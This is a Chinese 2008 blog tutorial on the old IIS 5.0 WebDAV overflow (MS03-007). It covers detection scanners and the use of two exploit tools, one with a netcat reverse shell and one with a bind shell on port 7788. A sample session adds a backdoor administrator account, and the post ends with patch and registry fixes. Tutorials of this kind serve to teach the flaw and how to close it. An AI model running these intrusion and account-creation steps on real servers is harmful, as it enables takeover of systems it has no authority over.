注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

傲气狂龙

文能起笔安天下,武能马上定乾坤,狂龙一出,谁与争锋。

 
 
 

日志

 
 
关于我

人只有张扬着野性,才不甘于沉沦。野性就是要有梦想,甚至是异想天开。人类就是在异想天开中进步的。

网易考拉推荐

菜鸟学习初级教程32——溢出专集  

2008-03-21 16:43:54|  分类: 黑客教程 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
溢出专集


2003年3月18日,微软发布MS03-007号安全公告:Microsoft IIS 5.0 WebDAV远程溢出漏洞,声称利用此漏洞溢出后可以得到localsystem权限,于是网上沸沸扬扬开始关注起此漏洞。到了3月下旬,发现此漏洞的老外发布了他的exploit,不过由于这个exploit是针对英文版的win2000的,所以对国内造成的影响不大。直至3月27日,国内某黑客在安全焦点上公布了其修改后的针对中文版win2000的此漏洞的exploit程序,于是第二天即3月28日,国内的各个黑客网站都纷纷提供了编译好的win平台下的WebDAV漏洞溢出攻击程序的下载,各个安全论坛便随处可见关于WebDAV远程溢出攻击的讨论,甚至更有甚者把溢出攻击过程做成了动画教程供人观摩,WebDAV漏洞溢出攻击在一夜之间"迅速走红"。而且,其攻击代码在3月29日时又被人改进,使其成功率又大幅提高,眼下WebDAV远程溢出攻击已经成为各种黑客最流行的攻击方法,其来势之迅速之猛烈是以前Unicode、printer等漏洞所不及,而且有被蠕虫制造者利用的可能,所以笔者认为有必要写此文章让广大网管和用户尽早了解这个漏洞情况及解决方案,以提高警惕、做好防范。
一、 漏洞基本情况
1、 漏洞名称及描述
名称:Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告:MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述:IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击,可能以Web进程权限在系统上执行任意指令。
2、 受影响系统



Microsoft IIS 5.0
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP3
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP2
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP1
- Microsoft Windows 2000 Professional/Server/
Datacenter Server



3、 什么是WebDAV组件
Microsoft IIS 5.0 (Internet Information Server 5)是Microsoft Windows 2000自带的一个网络
信息服务器,其中包含HTTP服务功能。IIS5默认提供了对WebDAV的支持,WebDAV(基于Web的分布式写作和改写)是一组对HTTP协议的扩展,它允许用户协作地编辑和管理远程Web服务器上的文件。使用WebDAV,可以通过HTTP向用户提供远程文件存储的服务,包括创建、移动、复制及删除远程服务器上的文件,但是作为普通的HTTP服务器,这个功能不是必需的。
4、 漏洞产生的原因
这个漏洞产生的原因具体是由于WebDAV使用了ntdll.dll中的一些API函数,而这些函数存在一个缓
冲区溢出漏洞,而Microsoft IIS 5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查,远程入侵者可以通过向WebDAV提交一个精心构造的超长的数据请求而导致发生缓冲区溢出,成功利用这个漏洞可以获得LocalSystem权限,这意味着入侵者可以获得主机的安全控制能力。所以确切地说,这个漏洞并不是IIS造成的,而是ntdll.dll里面的一个API函数造成的。也就是说,很多调用这个API的应用程序都存在这个漏洞。
5、 测试代码:见附件
WebDAV远程缓冲区溢出漏洞的基本情况我们这里介绍到这里了,如果读者有兴趣想进一步了解这个漏
洞具体的溢出原理分析,建议可以去安全焦http://www.xfocus.net/中参阅isno写的两篇关于WebDAV远程溢出漏洞分析的文章,很精彩!我这里就不班门弄斧了。
二、如何检测漏洞
在上面介绍漏洞基本情况的时候,我们已经说了IIS 5.0的默认配置是提供了对WebDAV的支持,也就是说,如果你的win 2000提供了IIS服务而没有打过针对此漏洞的补丁,那么一般情况下你的IIS就会存在这个漏洞,但如何来确定呢?我们可以借助一些工具来帮我们进行检测。
1、 第一个检测工具:Ptwebdav.exe
下载地址http://www.ttian.net/txt/show.php?id=10
简介:Ptwebdav.exe是一个老外写的专门用来远程检测Windows 2000 IIS 5.0服务器是否存在WebDAV
远程缓冲区溢出漏洞的东东,其操作界面非常简单,只要在其"IP or hostname"中填入要检测的主机和IIS服务端口,然后按"check"就可以了。笔者正用它来检测本地主机是否存在WebDAV漏洞,一会儿它就会在下面窗口里显示结果。这个工具不错,但它每次只能检测一台机子,如果你想检测一个网段内所有主机就比较麻烦了,一台台地检测不知道要检测到什么时候。让我们来看看第二个检测软件,它能帮我们解决这个问题。
2、 第二个检测工具:WebDAVScan v1.0
下载地址http://www.cnhonker.net/Down/show.php?id=65&;;down=1
简介:WebDAVScan是一个专门用于检测网段内的Microsoft IIS 5.0服务器是否提供了对WebDAV的
支持的扫描器,软件非常小,只有7.23KB,而且是个绿色软件,无须安装,直接运行即可!扫描后如有此安全漏洞,软件会自动生成扫描报告,原来也是老外写的,不过我们这里用的是WebDAVScan的汉化版。笔者扫描X.X.23.1-X.X.23.254的网段大概用了30秒时间,速度很快,窗口右边显示的是结果,"Enable"表示了此IIS支持WebDAV,至于有没有漏洞要看它有没有打过补丁了。经笔者测试,这个软件确实很不错,推荐大家使用,好了,WebDAV的检测也介绍完了,下面我们开始讲利用此漏洞测试攻击了。
二、 漏洞测试攻击
自从WebDAV的exploit代码出现后,网上紧接着就出现了好几种版本的溢出攻击程序,虽然其核心
代码类似,但具体的功能和操作还是有些区别的,我们这里来了解两个WebDAV的溢出攻击程序。
1、 第一个溢出程序:wb.exe
下载地址http://www.longker.com/txt/opensoft.asp?soft_id=131&;;url=1
简介:wb.exe是一个win32平台下已经编译好的针对英文版的IIS--webdav远程溢出攻击
程序,原代码的作者是Crpt的kralor,使用时行用Netcat在本地监听某个端口,如nc -L -p 666,然后使用此程序对远程主机进行溢出攻击,溢出成功后就能在本地监听口上获取远程主机的反向连接,获取localsystem权限的cmdshell,它需要指定远程主机反向连接主机IP、端口、补丁信息等参数:syntax: c:\K_WEBDAV.EXE<victim_host><your_host><your_port>[padding],如wb targetserver.com your_ip 666 3 ,攻击如果成功,那Netcat的监听窗口就会出现远程主机的shell。
2、 第二个溢出程序:webdavx.exe
下载地址http://www.longker.dom/txt/opensoft.asp?soft_id=135&;;url=1
简介:webdavx.exe是一个针对中文版server溢出程序,它是根据安全焦点Isno的perl代码编译成
的,这个版本只对中文版的有效,它的使用也不同于wb.exe,它溢出成功后直接在目标主机的7788端口上捆定一个localsystem权限的cmdshell,不像wb.exe需要反向连接,入侵者只要telnet到7788端口就可以了,所以用它在局域网内也能对局域网的主机进行攻击,当然wb.exe使用反向连接也有它的好处,因为许多WEB服务器的防火墙都设置为只允许通过到端口80的TCP连接,这样即使开了7788端口你也连接不上,而使用反向连接可以突破防火墙的TCP过滤,所以这两个软件各有用处各有特点,可以根据不同的需要进行选择。
3、 测试攻击实例
虽然讲了两个攻击软件的用法,但都只是纸上谈兵,我们还是来实际测试一下这个漏洞的威力如何!
我们测试的是中文版的IIS主机,使用的扫描软件是WebDAVScan的汉化版,攻击软件是webdavx.exe,为了输入方便,我把webdavx.exe改名为web.exe,在刚才介绍WebDAVScan 的时候我们已经扫描到的IIS支持WebDAV的主机中选一台,找开CMD,输入:



c:\web 2x..x.23.68
send buffer…(正在溢出)

telnet target 7788(溢出完成,请尝试telnet连接目标主机的7788端口)

c:\telnet 2x..x.23.68 7788
正在连接到2x..x.23.68…
Microsoft Windows 2000[Version 5.00.2195]

<C>版权所有制1985-2000Microsoft Corp
c:\winnt\system32> (溢出成功,已经连接到其7788端口)



当然事情上溢出不一定成功,如果telnet连接提示失败就说明溢出可能不成功,这里是笔者N次试验的结果,不过现在webdavx.exe的溢出代码重新进行了改进,其溢出成功率大幅提高,估计在1/2左右。而且得到的应该是system权限,比超级用户还高一级,可以加个administrator组的成员来试试:
c:\winnt\system32>net user hacker 111111 /add
The command completed successfully
C:\winnt\system32>net localgroup administrators hacker /add
The command completed successfully
命令成功了,看来System权限是真的了,那不是可在机器上干任何事情了?还真有点可怕!好了,我们这里只是测试,到此就停止吧!
三、 漏洞消除方案
我们上面已经看到了WebDAV远程溢出攻击的威力了吧,而到本文截稿为止,国内网络上的WebDAV远
程溢出攻击是越来越多了,你的IIS服务器一不小心就有可能被黑客攻击而成为被控制的傀儡,所以管理员和用户们千万不能大意,一定要尽快地堵上这个漏洞,千万不能再重演像MSSQL的远程溢出漏洞那样的惨痛教训了。具体的可以通过以下几个方案来解决:
⑴ 安装补丁,目前微软已经提供了此漏洞的补丁,下载地址http://microsoft.com/downloads/
details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
或者,你也可以作用微软提供的IIS Lockdown工具来防止该漏洞被利用。
⑵ 如果你不能立刻安装补丁或升级,也可以手工修补这个漏洞,我们上面已经说了WebDAV功能对一般的Web服务器来说并不需要,所以可以把它停止掉。WebDAV在IIS 5.0 WEB服务器上的实现是由Httpext.dll完成,默认安装,但是简单更改Httpext.ell不能修正此漏洞,因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求,需要对注册表进行如下更改:
启动注册表编辑器,搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
找到后点击"编辑"菜单,点击"增加值",然后增加如下注册表键值:
value name: DisableWebDAV
Data typeWORD
value data: 1
最后别忘了重新启动IIS,只有重启IIS后新的设置才会生效
  评论这张
 
阅读(313)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017